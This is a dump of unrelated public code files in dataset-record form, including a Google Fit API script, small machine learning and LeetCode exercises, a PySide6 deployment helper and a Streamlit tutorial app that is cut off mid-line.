B\r\n\r\n in command line install pandas - pip install panda\r\n\r\n SEE CODE BELOW -> comment out corresponding\r\n \r\n 3.1.2 Now that we have the dataSourceIDs, let's call whichever by adding it to the end of the url\r\n url = \"https://www.googleapis.com/fitness/v1/users/me/dataSources/derived:com.google.step_count.delta:com.google.android.gms:merge_step_deltas\"\r\n\r\n -> so this is the json format the we got here, not the data\r\n -> if we want the actual data, we need to add at the end: /dataPointChanges\r\n url = \"https://www.googleapis.com/fitness/v1/users/me/dataSources/derived:com.google.step_count.delta:com.google.android.gms:merge_step_deltas/dataPointChanges\"\r\n\r\n 3.1.3 Let's get an excel where we get back the steps with dates\r\n\r\n SEE CODE BELOW -> comment out corresponding\r\n\r\n -> Visualize in excel -> Ask ChatGPT: \r\n 29-09-2023\t21\t51\r\n 29-09-2023\t21\t95\r\n 29-09-2023\t21\t88\r\n 29-09-2023\t21\t9\r\n 29-09-2023\t21\t74\r\n 29-09-2023\t21\t38\r\n 29-09-2023\t21\t22\r\n 29-09-2023\t21\t46\r\n \r\n This is my data\r\n\r\n I want a vba that adds together values in column c if in column b the values are same, and deletes the rows that it calculated from only keeping 1 row where the sum shows\r\n\r\n So for example:\r\n 29-09-2023\t21\t88\r\n 29-09-2023\t21\t9\r\n\r\n the end result would be this:\r\n 29-09-2023\t21\t98\r\n\r\n -> F11 -> paste -> save ->F8 -> Run / Create a button for it in Excel Developer Module\r\n \r\n -> than in excel press F11 for instant chart view\r\n\r\n'''\r\n\r\n\r\nimport requests\r\nimport json\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\n\r\nACCESS_TOKEN = 'paste here from step 2.'\r\n\r\nurl = 'paste here from corresponding step'\r\n\r\nheaders = {\r\n \"Authorization\": f\"Bearer {ACCESS_TOKEN}\",\r\n \"Content-Type\": \"application/json\"\r\n}\r\n\r\n# Make the GET request\r\nresponse = requests.get(url, headers=headers)\r\n\r\n#STARTING POINT -> ONLY COMMENT THIS OUT, DONT DELETE!! ->\r\nif response.status_code == 200:\r\n # The request was successful, and you can work with the response data here\r\n data = response.json()\r\n # Pretty-print the JSON data\r\n print(json.dumps(data, indent=4))\r\nelse:\r\n # Handle the error or provide appropriate error handling\r\n print(f\"Request failed with status code: {response.status_code}\")\r\n\r\n\r\n#TESTs BELOW HERE->\r\n\r\n#3.1.1\r\n\"\"\" if response.status_code == 200: \r\n # The request was successful, and you can work with the response data here\r\n try:\r\n data = json.loads(response.content.decode('utf-8'))\r\n \r\n # Extract dataStreamId and corresponding name values\r\n data_stream_info = [(item[\"dataType\"].get(\"name\"), item.get(\"dataStreamId\")) for item in data[\"dataSource\"]]\r\n \r\n # Create a DataFrame from the extracted data\r\n df = pd.DataFrame(data_stream_info, columns=[\"Name\", \"ID\"])\r\n \r\n # Save the DataFrame to an Excel file\r\n df.to_excel(\"3.1 name - dataStreamID.xlsx\", index=False)\r\n \r\n print(\"Data saved to 3.1 name - dataStreamID.xlsx\")\r\n \r\n except json.JSONDecodeError as e:\r\n print(f\"Error decoding JSON response: {e}\") \"\"\"\r\n\r\n#3.1.3\r\n\"\"\" if response.status_code == 200:\r\n # The request was successful, and you can work with the response data here\r\n data = response.json()\r\n\r\n # Extract relevant information\r\n inserted_data = data.get(\"insertedDataPoint\", [])\r\n \r\n # Create lists to store extracted data\r\n start_times_day = []\r\n start_times_hour = []\r\n step_counts = []\r\n\r\n for entry in inserted_data:\r\n start_time_nanos = entry.get(\"startTimeNanos\")\r\n step_count = entry.get(\"value\", [{}])[0].get(\"intVal\")\r\n\r\n # Convert nanoseconds to a human-readable date-time format\r\n start_time_day = datetime.utcfromtimestamp(int(start_time_nanos) / 1e9).strftime('%d-%m-%Y')\r\n start_time_hour = datetime.utcfromtimestamp(int(start_time_nanos) / 1e9).strftime('%H')\r\n \r\n start_times_day.append(start_time_day)\r\n start_times_hour.append(start_time_hour)\r\n step_counts.append(step_count)\r\n\r\n # Create a DataFrame\r\n df = pd.DataFrame({\r\n \"Start DAY\": start_times_day,\r\n \"Start HOUR\": start_times_hour,\r\n \"Step Count\": step_counts\r\n })\r\n\r\n # Save the DataFrame to an Excel file\r\n df.to_excel(\"step_count_day_hour_2.xlsx\", index=False)\r\n \r\n print(\"Data saved to .xlsx\")\r\nelse:\r\n # Handle the error or provide appropriate error handling\r\n print(f\"Request failed with status code: {response.status_code}\") \"\"\"","repo_name":"laszlo678/health-api","sub_path":"3.1 Google Fit - Fitness API - Web.py","file_name":"3.1 Google Fit - Fitness API - Web.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"29720712430","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.metrics import f1_score, r2_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import tree\nfrom joblib import dump, load\n\ndata = pd.read_csv(\"murb.csv\", sep=r'\\s*,\\s*', header=0, encoding='ascii', engine='python')\n\n# Shuffle Data\ndata = data.sample(frac=1)\n\n# Split into training and test data (80 and 20% each)\ntraining_data, test_data = np.split(data, [int(0.8 * len(data))])\n\n# Define X and Y\nX = training_data[['hour', 'month', 'average_power_for_condo', 'min_power_for_condo', 'max_power_for_condo']]\nX_test = test_data[['hour', 'month', 'average_power_for_condo', 'min_power_for_condo', 'max_power_for_condo']]\nY = training_data['power']\nY_test = test_data['power']\n\n# Fit Regression Model\n\nclf = tree.DecisionTreeRegressor()\n\n# Fit and Predict\nclf.fit(X, Y)\nY_predict = clf.predict(X_test)\n\n# Predictor scores\ntest = r2_score(Y_predict, Y_test)\ntest2 = cross_val_score(clf, X_test, Y_test)\nprint(test)\nprint(test2)\n\n# Export Model\ndump(clf, 'murb.csv.joblib')\n","repo_name":"Team-AC/EMS-Simulation","sub_path":"ml_models/murb_power_regression.py","file_name":"murb_power_regression.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"2303820859","text":"\"\"\"\nElectricity Bill Estimator\n\"\"\"\n\nprint(\"ELECTRICITY BILL ESTIMATOR PROGRAM\")\n\nkwh_price = float(input(\"Enter price per kWH in cents: \"))\ndaily_use = float(input(\"Enter daily use in kWH: \"))\nbill_days = float(input(\"Enter number of billing days: \"))\n\ntotal_bill = (daily_use * bill_days) * (kwh_price/100)\nprint(\"Estimated bill : $ {:.2f}\".format(total_bill))\n\n","repo_name":"geraldlcpd/cp1404_practicals","sub_path":"prac_01/electrical_bill.py","file_name":"electrical_bill.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71179722557","text":"misHijos = [\"erika\", \"luis alfonso\", \"Ramón\", \"Alex\", \"kiwi\",\n \"Maria Unpajote\", \"Bernarda\"]\nfor nombre in misHijos:\n print(f\"Mi hij@ es: {nombre}\")\n\n\nmisnumeritos = [1, 2, 123, -123, 123.323, 1]\nfor x in misnumeritos:\n print(f\"Mi num. es: {x}\")\n\nfor i in range(0, len(misnumeritos)):\n print(f\"Mi hijo num.{i} es: {misnumeritos[i]}\")\n\nx = 0\nwhile x < 10:\n print(x)\n # x = x + 1\n x += 1\n\nsquares = list(map(lambda x: x**2, range(10)))\nsquares2 = [x**2 for x in range(10)]\nprint(squares, squares2)\n","repo_name":"XxmonioxX/First_Python_Project","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19747741876","text":"from typing import List\n\n\ndef findDuplicate(nums: List[int]) -> int:\n slow = 0\n fast = 0\n while True:\n slow = nums[slow]\n fast = nums[nums[fast]]\n if slow == fast:\n break\n slow = 0\n while slow != fast:\n slow = nums[slow]\n fast = nums[fast]\n return slow\n\n\ndef main():\n nums = [1, 3, 4, 2, 2]\n print(\"Given Array: \", nums)\n print(\"Duplicate number \", str(findDuplicate(nums)))\n nums = [3, 1, 3, 4, 2]\n print(\"Given Array: \", nums)\n print(\"Duplicate number \", str(findDuplicate(nums)))\n\n\nmain()\n","repo_name":"tulasidamarla/leetcode","sub_path":"src/main/java/com/learning/leetcode/arrays/medium/FindDuplicate.py","file_name":"FindDuplicate.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26816685270","text":"from shavas_logger import *\n\nTOP = 'TOP'\nRIGHT = 'RIGHT'\nLEFT = 'LEFT'\nBOTTOM = 'BOTTOM'\n\nTOP_LEFT = 'TOP_LEFT'\nTOP_RIGHT = 'TOP_RIGHT'\nBOTTOM_LEFT = 'BOTTOM_LEFT'\nBOTTOM_RIGHT = 'BOTTOM_RIGHT'\n\nMAX_Y = 'max_Y'\nMAX_X = 'max_X'\nMIN_Y = 'min_Y'\nMIN_X = 'min_X'\n\nX = 'X'\nY = 'Y'\n\ndef getPixelsOfDrawing(image_array):\n drawing_pixels_holder = []\n BLACK = 50\n\n try:\n for row_index, row_values in enumerate(image_array):\n hasDrawingColor = hasRowBlackPixels(row_values, BLACK)\n\n if (hasDrawingColor == True):\n for column_index, column_value in enumerate(row_values):\n if (column_value <= BLACK):\n drawing_pixels_holder.append((row_index, column_index))\n except Exception as e:\n logError(f'> \\33[91m ERROR - GETTING PIXELS failed:\\33[0m {e}')\n\n return drawing_pixels_holder\n\ndef getMaxMinCornerValues(image_array):\n global MAX_Y, MAX_X, MIN_Y, MIN_X\n drawing_pixels_holder = getPixelsOfDrawing(image_array)\n\n try:\n max_Y = max(drawing_pixels_holder, key=lambda item: item[0])[0]\n\n max_X = max(drawing_pixels_holder, key=lambda item: item[1])[1]\n\n min_Y = min(drawing_pixels_holder, key=lambda item: item[0])[0]\n\n min_X = min(drawing_pixels_holder, key=lambda item: item[1])[1]\n except Exception as e:\n logError(f'> \\33[91m ERROR - MaxMin failed:\\33[0m {e}')\n\n return {MAX_Y: max_Y,\n MAX_X: max_X,\n MIN_Y: min_Y,\n MIN_X: min_X}\n\ndef getCornerDistancesDictionary(dictMaxMinCornerValues, image_array):\n global MAX_Y, MAX_X, MIN_Y, MIN_X\n global TOP, RIGHT, BOTTOM, LEFT\n distance_bottom = dictMaxMinCornerValues[MAX_Y]\n distance_right = dictMaxMinCornerValues[MAX_X]\n distance_top = dictMaxMinCornerValues[MIN_Y]\n distance_left = dictMaxMinCornerValues[MIN_X]\n\n cols, rows = getShapeInfo(image_array)\n\n distance_bottom = rows - distance_bottom\n distance_right = cols - distance_right\n\n # distances from pixel on canvas to its border\n return {BOTTOM: distance_bottom,\n RIGHT: distance_right,\n TOP: distance_top,\n LEFT: distance_left}\n\ndef getCornersOfDrawingFrame(dictMaxMinCornerValues):\n global MAX_Y, MAX_X, MIN_Y, MIN_X\n global TOP_LEFT, TOP_RIGHT, BOTTOM_LEFT, BOTTOM_RIGHT, X, Y\n # distances from origin\n return {\n TOP_LEFT: {X: dictMaxMinCornerValues[MIN_X],\n Y: dictMaxMinCornerValues[MIN_Y]},\n TOP_RIGHT: {X: dictMaxMinCornerValues[MAX_X],\n Y: dictMaxMinCornerValues[MIN_Y]},\n BOTTOM_LEFT: {X: dictMaxMinCornerValues[MIN_X],\n Y: dictMaxMinCornerValues[MAX_Y]},\n BOTTOM_RIGHT: {X: dictMaxMinCornerValues[MAX_X],\n Y: dictMaxMinCornerValues[MAX_Y]}\n }\n\ndef getShapeInfo(image_array):\n rows, cols = image_array.shape\n return (cols, rows)\n\ndef hasRowBlackPixels(row_values, val_to_check_for):\n return any(_val_of_line <= val_to_check_for for _val_of_line in row_values)","repo_name":"Jaqqen/ShaVas","sub_path":"backend/frame_drawing.py","file_name":"frame_drawing.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"27792108768","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Network(nn.Module):\n INPUT_CHANNELS = 3\n\n def __init__(self, board_size):\n super(Network, self).__init__()\n self.conv1 = nn.Conv2d(3, 8, 2, stride=1, padding=1)\n self.conv2 = nn.Conv2d(8, 16, 2, stride=1, padding=1)\n self.maxPool = nn.MaxPool2d(3, stride=1, padding=1)\n self.x1 = nn.Linear(3168, 256)\n self.x2 = nn.Linear(256, 4)\n self.out = nn.LogSoftmax()\n\n def forward(self, x):\n x = self.maxPool(self.conv1(x))\n x = self.maxPool(self.conv2(x))\n x = x.flatten(1)\n x = F.relu(self.x1(x))\n x = F.relu(self.x2(x))\n return self.out(x)\n","repo_name":"c-mac/gym-rc-snake","sub_path":"agent/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"12459547287","text":"import ast\nimport logging\nimport os\nimport re\nimport sys\nimport warnings\nfrom typing import List\nfrom importlib import util\n\nif sys.version_info >= (3, 8):\n from importlib.metadata import version\nelse:\n from importlib_metadata import version\n\nfrom pathlib import Path\n\nfrom . import Config, Nuitka, run_command\n\nIMPORT_WARNING_PYSIDE = (f\"[DEPLOY] Found 'import PySide6' in file {0}\"\n \". Use 'from PySide6 import <module>' or pass the module\"\n \" needed using --extra-modules command line argument\")\n\n\ndef find_pyside_modules(project_dir: Path, extra_ignore_dirs: List[Path] = None,\n project_data=None):\n \"\"\"\n Searches all the python files in the project to find all the PySide modules used by\n the application.\n \"\"\"\n all_modules = set()\n mod_pattern = re.compile(\"PySide6.Qt(?P<mod_name>.*)\")\n\n def pyside_imports(py_file: Path):\n modules = []\n contents = py_file.read_text(encoding=\"utf-8\")\n try:\n tree = ast.parse(contents)\n for node in ast.walk(tree):\n if isinstance(node, ast.ImportFrom):\n main_mod_name = node.module\n if main_mod_name.startswith(\"PySide6\"):\n if main_mod_name == \"PySide6\":\n # considers 'from PySide6 import QtCore'\n for imported_module in node.names:\n full_mod_name = imported_module.name\n if full_mod_name.startswith(\"Qt\"):\n modules.append(full_mod_name[2:])\n continue\n\n # considers 'from PySide6.QtCore import Qt'\n match = mod_pattern.search(main_mod_name)\n if match:\n mod_name = match.group(\"mod_name\")\n modules.append(mod_name)\n else:\n logging.warning((\n f\"[DEPLOY] Unable to find module name from{ast.dump(node)}\"))\n\n if isinstance(node, ast.Import):\n for imported_module in node.names:\n full_mod_name = imported_module.name\n if full_mod_name == \"PySide6\":\n logging.warning(IMPORT_WARNING_PYSIDE.format(str(py_file)))\n except Exception as e:\n raise RuntimeError(f\"[DEPLOY] Finding module import failed on file {str(py_file)} with \"\n f\"error {e}\")\n\n return set(modules)\n\n py_candidates = []\n ignore_dirs = [\"__pycache__\", \"env\", \"venv\", \"deployment\"]\n\n if project_data:\n py_candidates = project_data.python_files\n ui_candidates = project_data.ui_files\n qrc_candidates = project_data.qrc_files\n ui_py_candidates = None\n qrc_ui_candidates = None\n\n if ui_candidates:\n ui_py_candidates = [(file.parent / f\"ui_{file.stem}.py\") for file in ui_candidates\n if (file.parent / f\"ui_{file.stem}.py\").exists()]\n\n if len(ui_py_candidates) != len(ui_candidates):\n warnings.warn(\"[DEPLOY] The number of uic files and their corresponding Python\"\n \" files don't match.\", category=RuntimeWarning)\n\n py_candidates.extend(ui_py_candidates)\n\n if qrc_candidates:\n qrc_ui_candidates = [(file.parent / f\"rc_{file.stem}.py\") for file in qrc_candidates\n if (file.parent / f\"rc_{file.stem}.py\").exists()]\n\n if len(qrc_ui_candidates) != len(qrc_candidates):\n warnings.warn(\"[DEPLOY] The number of qrc files and their corresponding Python\"\n \" files don't match.\", category=RuntimeWarning)\n\n py_candidates.extend(qrc_ui_candidates)\n\n for py_candidate in py_candidates:\n all_modules = all_modules.union(pyside_imports(py_candidate))\n return list(all_modules)\n\n # incase there is not .pyproject file, search all python files in project_dir, except\n # ignore_dirs\n if extra_ignore_dirs:\n ignore_dirs.extend(extra_ignore_dirs)\n\n # find relevant .py files\n _walk = os.walk(project_dir)\n for root, dirs, files in _walk:\n dirs[:] = [d for d in dirs if d not in ignore_dirs and not d.startswith(\".\")]\n for py_file in files:\n if py_file.endswith(\".py\"):\n py_candidates.append(Path(root) / py_file)\n\n for py_candidate in py_candidates:\n all_modules = all_modules.union(pyside_imports(py_candidate))\n\n if not all_modules:\n ValueError(\"[DEPLOY] No PySide6 modules were found\")\n\n return list(all_modules)\n\n\nclass PythonExecutable:\n \"\"\"\n Wrapper class around Python executable\n \"\"\"\n\n def __init__(self, python_path=None, dry_run=False):\n self.exe = python_path if python_path else Path(sys.executable)\n self.dry_run = dry_run\n self.nuitka = Nuitka(nuitka=[os.fspath(self.exe), \"-m\", \"nuitka\"])\n\n @property\n def exe(self):\n return Path(self._exe)\n\n @exe.setter\n def exe(self, exe):\n self._exe = exe\n\n @staticmethod\n def is_venv():\n venv = os.environ.get(\"VIRTUAL_ENV\")\n return True if venv else False\n\n def is_pyenv_python(self):\n pyenv_root = os.environ.get(\"PYENV_ROOT\")\n\n if pyenv_root:\n resolved_exe = self.exe.resolve()\n if str(resolved_exe).startswith(pyenv_root):\n return True\n\n return False\n\n def install(self, packages: list = None):\n _, installed_packages = run_command(command=[str(self.exe), \"-m\", \"pip\", \"freeze\"], dry_run=False\n , fetch_output=True)\n installed_packages = [p.decode().split('==')[0] for p in installed_packages.split()]\n for package in packages:\n package_info = package.split('==')\n package_components_len = len(package_info)\n package_name, package_version = None, None\n if package_components_len == 1:\n package_name = package_info[0]\n elif package_components_len == 2:\n package_name = package_info[0]\n package_version = package_info[1]\n else:\n raise ValueError(f\"{package} should be of the format 'package_name'=='version'\")\n if (package_name not in installed_packages) and (not self.is_installed(package_name)):\n logging.info(f\"[DEPLOY] Installing package: {package}\")\n run_command(\n command=[self.exe, \"-m\", \"pip\", \"install\", package],\n dry_run=self.dry_run,\n )\n elif package_version:\n installed_version = version(package_name)\n if package_version != installed_version:\n logging.info(f\"[DEPLOY] Installing package: {package_name}\"\n f\"version: {package_version}\")\n run_command(\n command=[self.exe, \"-m\", \"pip\", \"install\", \"--force\", package],\n dry_run=self.dry_run,\n )\n else:\n logging.info(f\"[DEPLOY] package: {package_name}=={package_version}\"\n \" already installed\")\n else:\n logging.info(f\"[DEPLOY] package: {package_name} already installed\")\n\n def is_installed(self, package):\n return bool(util.find_spec(package))\n\n def create_executable(self, source_file: Path, extra_args: str, config: Config):\n if config.qml_files:\n logging.info(f\"[DEPLOY] Included QML files: {config.qml_files}\")\n\n command_str = self.nuitka.create_executable(\n source_file=source_file,\n extra_args=extra_args,\n qml_files=config.qml_files,\n excluded_qml_plugins=config.excluded_qml_plugins,\n dry_run=self.dry_run,\n )\n\n return command_str\n","repo_name":"qtproject/pyside-pyside-setup","sub_path":"sources/pyside-tools/deploy_lib/python_helper.py","file_name":"python_helper.py","file_ext":"py","file_size_in_byte":8248,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"96"} +{"seq_id":"25922620630","text":"class Solution:\n def findRestaurant(self, list1: List[str], list2: List[str]) -> List[str]:\n n1 = len(list1)\n n2 = len(list2)\n \n temp = []\n \n for i in range(n1):\n for j in range(n2):\n if list1[i] == list2[j]:\n temp.append([list1[i], i+j])\n \n temp.sort(key=lambda restaurant: restaurant[1])\n \n MIN_INDEX_SUM = (temp[0])[1]\n m = len(temp)\n ret = []\n \n index = 0\n for i in range(m):\n if (temp[i])[1] == MIN_INDEX_SUM:\n ret.append((temp[i])[0])\n else:\n break\n\n return ret","repo_name":"hosjiu1702/LeetCode-Challenge","sub_path":"solutions/ex-73.py","file_name":"ex-73.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15816823312","text":"import numpy as np\n\ndef compute_bins(bin_params):\n\n bins = []\n\n for start, stop, nb_bins in bin_params: \n bins.append(np.linspace(start, stop, nb_bins))\n\n return bins\n\ndef distributions_from_labels(properties, labels, prop_bins, nb_classes=2):\n\n # distribution of fine classes P_p(Y = s)\n distr_s = []\n\n # list of distributions of property values P_p(C = c)\n distr_c = []\n\n # list of distribution per property P_p(C = c, Y = s)\n distr_joint = []\n\n for prop, bins in zip(properties, prop_bins):\n \n B = len(bins) - 1\n \n # ignore pixels with nan as property value in the stats. This is also why also P_p(s) depends on the property\n valid_idx = ~np.isnan(prop)\n valid_prop = prop[valid_idx]\n valid_labels = labels[valid_idx]\n nb_valid_points = len(valid_prop)\n \n hist_joint = np.zeros((nb_classes, B))\n hist_s = np.zeros(nb_classes)\n\n # get nb points per bin\n hist_c = np.histogram(valid_prop, bins=bins)[0]\n\n # loop over fine classes\n for s in range(nb_classes):\n\n s_labels = valid_labels == s\n hist_s[s] = np.sum(s_labels)\n\n hist_joint[s] = np.histogram(valid_prop[s_labels], bins=bins)[0]\n\n distr_joint.append(hist_joint / nb_valid_points)\n distr_s.append(hist_s / nb_valid_points)\n distr_c.append(hist_c / nb_valid_points)\n \n return distr_joint, distr_c, distr_s","repo_name":"vzantedeschi/fine-classification","sub_path":"src/property_analysis.py","file_name":"property_analysis.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19962909595","text":"import streamlit as st\nimport numpy as np\nimport pandas as pd\nimport altair as alt\n\nst.set_page_config(page_title=\"Streamlit Getting Started Guide\", initial_sidebar_state=\"expanded\")\n\nstate = st.get_state()\n\noptions = (\"🏃‍♀️Getting Started\",\n \"⬇️ Installing Streamlit\",\n \"🏗 Basic Functions\",\n \"🎨 Layout and Themes\",\n \"🏎 App Performance\",\n \"🚀 Deploying your App\",\n \"🎈 More Resources\")\n\nif state.nav is None:\n state.nav = options[0]\n\nnav = st.sidebar.selectbox(\"Choose a section\", options, key=\"nav\")\n\ndef on_next_click():\n state.nav = options[options.index(state.nav) + 1]\n\nif state.nav == \"🏃‍♀️Getting Started\":\n \"\"\"\n # Getting Started with Streamlit\n Welcome to Streamlit! Streamlit is an open-source framework for easily creating web apps in Python.\n Whether you want to show off your machine learning model, build an advanced analytics app, or create an internal tool, you can quickly make your app with Streamlit.\n\n Check out some examples and templates or go to [streamlit.io/gallery](streamlit.io/gallery) to browse many more.\n ##\n \"\"\"\n\n # img_col1, img_col2, img_col3 = st.beta_columns(3)\n #\n # with img_col1:\n # st.image(\"images/apps/demo-uber.png\", width=225)\n # st.markdown(\n # f'<p align=center><a href=\"https://share.streamlit.io/streamlit/demo-uber-nyc-pickups/\">Browse NYC Uber data</a></p>',\n # unsafe_allow_html=True,\n # )\n #\n # with img_col2:\n # st.image(\"images/apps/demo-gan.png\", width=225)\n # st.markdown(\n # f'<p align=center><a href=\"https://share.streamlit.io/streamlit/demo-face-gan\">Try out a GAN</a></p>',\n # unsafe_allow_html=True,\n # )\n #\n # with img_col3:\n # st.image(\"images/apps/demo-themes.png\", width=225)\n # st.markdown(\n # f'<p align=center><a href=\"https://share.streamlit.io/streamlit/theming-showcase/main\">See theming examples</a></p>',\n # unsafe_allow_html=True,\n # )\n\n # \"\"\"\n # ### Templates\n # \"\"\"\n\n template_col1, template_col2, template_col3 = st.beta_columns(3)\n\n with template_col1:\n st.image(\"images/apps/basic.png\", width=225)\n st.markdown(\n f'<p align=center><a href=\"https://share.streamlit.io/kellyamanda/templates/main/template_basic.py\">Basic layout with sidebar</a></p>',\n unsafe_allow_html=True,\n )\n\n with template_col2:\n st.image(\"images/apps/wide.png\", width=225)\n st.markdown(\n f'<p align=center><a href=\"https://share.streamlit.io/kellyamanda/templates/main/template_wide.py\">Wide mode layout</a></p>',\n unsafe_allow_html=True,\n )\n with template_col3:\n st.image(\"images/apps/demo-themes.png\", width=225)\n st.markdown(\n f'<p align=center><a href=\"https://share.streamlit.io/streamlit/theming-showcase/main\">Theming examples</a></p>',\n unsafe_allow_html=True,\n )\n # with template_col3:\n # st.image(\"images/apps/explainer.png\", width=225)\n # st.markdown(\n # f'<p align=center><a href=\"https://share.streamlit.io/kellyamanda/templates/main/template_explainer.py\">Explanation style layout</a></p>',\n # unsafe_allow_html=True,\n # )\n\n \"\"\"\n ##\n Ready to get set up? Click below for instructions on installing Streamlit. ⬇️\n \"\"\"\n st.button(\"Next > Install Streamlit\", on_click=on_next_click)\n\nif state.nav == \"⬇️ Installing Streamlit\":\n \"\"\"\n # Installing the Streamlit library\n ##\n \"\"\"\n\n install_col1, install_col2, install_col3 = st.beta_columns(3)\n install_code = \"pip install streamlit\"\n\n with install_col1:\n st.image(\"images/icons/windows.png\", width=57)\n st.subheader(\"Windows\")\n st.write(\"Some words about Windows and link to troubleshooting\")\n st.code(install_code, language=\"bash\")\n\n with install_col2:\n st.image(\"images/icons/mac.jpeg\", width=78)\n st.subheader(\"Mac\")\n st.write(\"Some words about Mac and link to troubleshooting\")\n st.code(install_code, language=\"bash\")\n\n with install_col3:\n st.image(\"images/icons/linux.png\", width=50)\n st.subheader(\"Linux\")\n st.write(\"Some words about Linux and link to troubleshooting\")\n st.code(install_code, language=\"bash\")\n\n \"\"\"\n #\n Ready to get into the code? Click below to learn about basic Streamlit functions. 🏗\n \"\"\"\n st.button(\"Next > Basic Functions\", on_click=on_next_click)\n\nif state.nav == \"🏗 Basic Functions\":\n \"\"\"\n # Streamlit's basic functions\n There's a way to do just about anything you want with Streamlit, but here we'll introduce you\n to the basics of text, data, widgets, and visualizations. For more complex examples poke around on the\n [Streamlit forum](discuss.streamlit.io).\n\n ## Text\n Your basic functions for text are `st.title`, `st.header`, `st.subtitle`, and `st.write`.\n You can also use specialized functions like `st.markdown`, `st.text`, `st.code`, or `st.latex`. Here are some examples.\n \"\"\"\n\n with st.echo():\n st.subheader(\"Here's a subheader\")\n st.write(\"Here's some regular text with **bolding**\")\n\n \"\"\"\n #\n ## Data\n\n The easiest way to write data is just to use the `st.write` function. You can also use `st.table` or `st.dataframe` for different layouts.\n \"\"\"\n\n with st.echo():\n df = pd.DataFrame({\n 'first column': [1, 2, 3, 4],\n 'second column': [10, 20, 30, 40]\n })\n st.write(df)\n\n \"\"\"\n #\n ## Visualizing Data\n\n So much data visualization! For charts there are some basic functions in Streamlit color_picker `st.line_chart`\n and `st.map`, but Streamlit also supports Altair, PyPlot, Vega Lite, Plotly, Bokeh, PyDeck, Seaborn and more.\n Check out the docs for [all the charting types](https://docs.streamlit.io/en/stable/api.html?highlight=number_input#display-charts).\n \"\"\"\n with st.echo():\n df = pd.DataFrame(\n np.random.randn(200, 3),\n columns=['a', 'b', 'c'])\n\n st.subheader(\"Basic line chart\")\n st.line_chart(df)\n st.subheader(\"Altair chart\")\n c = alt.Chart(df).mark_circle().encode(\n x='a', y='b', size='c', color='c', tooltip=['a', 'b', 'c'])\n st.altair_chart(c, use_container_width=True)\n\n \"\"\"\n #\n ## Widgets\n\n Get your app interactive! Widgets are the core of building a great app. Streamlit offers a large number of widgets including\n `st.button`, `st.checkbox`, `st.radio`, `st.selectbox`, `st.multiselect`, `st.slider`, `st.text_input`, `st.date_input`, `st.number_input`, and [many more](https://docs.streamlit.io/en/stable/api.html#display-interactive-widgets).\n\n To use widgets, you just make a new variable and assign the value from the widget to it. Then you can use that to manipulate things in your app.\n \"\"\"\n\n with st.echo():\n number = st.slider(\"select a number\",1,100)\n emoji = st.radio(\"select emojis\",(\"🍩\",\"🦊\",\"🎈\",\"🐳\"))\n# emoji = st.selectbox(\"select emojis\",(\"🍩\",\"🦊\",\"🎈\",\"🐳\"), key=\"emoji\")\n# result = number * emoji\n# st.write(\"You have asked for \",number,\"of \", emoji,\": \")\n# st.write(result)\n \n\n \"\"\"\n #\n ## Media\n\n Use `st.image`, `st.video`, and `st.audio` to quickly add media to your app.\n \"\"\"\n\n with st.echo():\n st.subheader(\"Images\")\n st.image(\"https://rb.gy/2kdyzg\")\n\n st.subheader(\"Videos\")\n st.video(\"https://www.youtube.com/watch?v=IwOfCgkyEj0\")\n\n \"\"\"\n #\n Now that you know the basics, let's get into app layout and customization 🎨\n \"\"\"\n st.button(\"Next > Layout and Themes\", on_click=on_next_click)\n\nif state.nav == \"🎨 Layout and Themes\":\n \"\"\"\n # Layout and Theming for your app\n Now that you've mastered the basic functions, it's time to take your app to the next level by adding layout and themes.\n\n ## Sidebar\n The Sidebar is a great option for persistent text or controls for your app. To move something to the sidebar just append `st.sidebar` in front\n of the function. Expand the sidebar to the left to see the controls we have for this app.\n\n \"\"\"\n st.code(\"\"\"\n nav = st.sidebar.selectbox(\"Choose a section\",\n (\"Getting Started\",\n \"Installing Streamlit\",\n \"Basic Functions\",\n \"Layout and Themes\",\n \"Performance\"\n \"Deploying your App\",\n \"More Resources\"))\n \"\"\",\n language=\"python\")\n\n \"\"\"\n (A word of warning... while you can put an infinite amount of things in the sidebar, if you have a lot of\n controls or text you probably want to consider another layout! See more below.)\n\n ## Columns and Grid Layout\n Columns are your go to layout option when you want to display things side by side or in a grid.\n This is a great option for displaying a lot of widgets at the top of your app or for displaying a number of charts or data next to one another.\n\n \"\"\"\n with st.echo():\n df = pd.DataFrame(\n np.random.randn(200, 3),\n columns=['a', 'b', 'c'])\n\n st.subheader(\"Widget layout example\")\n\n a1, a2, a3 = st.beta_columns(3)\n\n with a1:\n st.multiselect(\"Choose data\", [\"a\", \"b\", \"c\"])\n st.slider(\"Select value\",1,100)\n\n with a2:\n st.number_input(\"Select number\", 1,10)\n st.text_input(\"Add text\")\n\n with a3:\n st.date_input(\"Select date\")\n st.time_input(\"Pick a time\")\n\n st.subheader(\"Chart layout example\")\n\n b1, b2 = st.beta_columns((2,1)) # use this notation to specify relative widths of columns\n\n with b1:\n st.area_chart(df)\n with b2:\n st.write 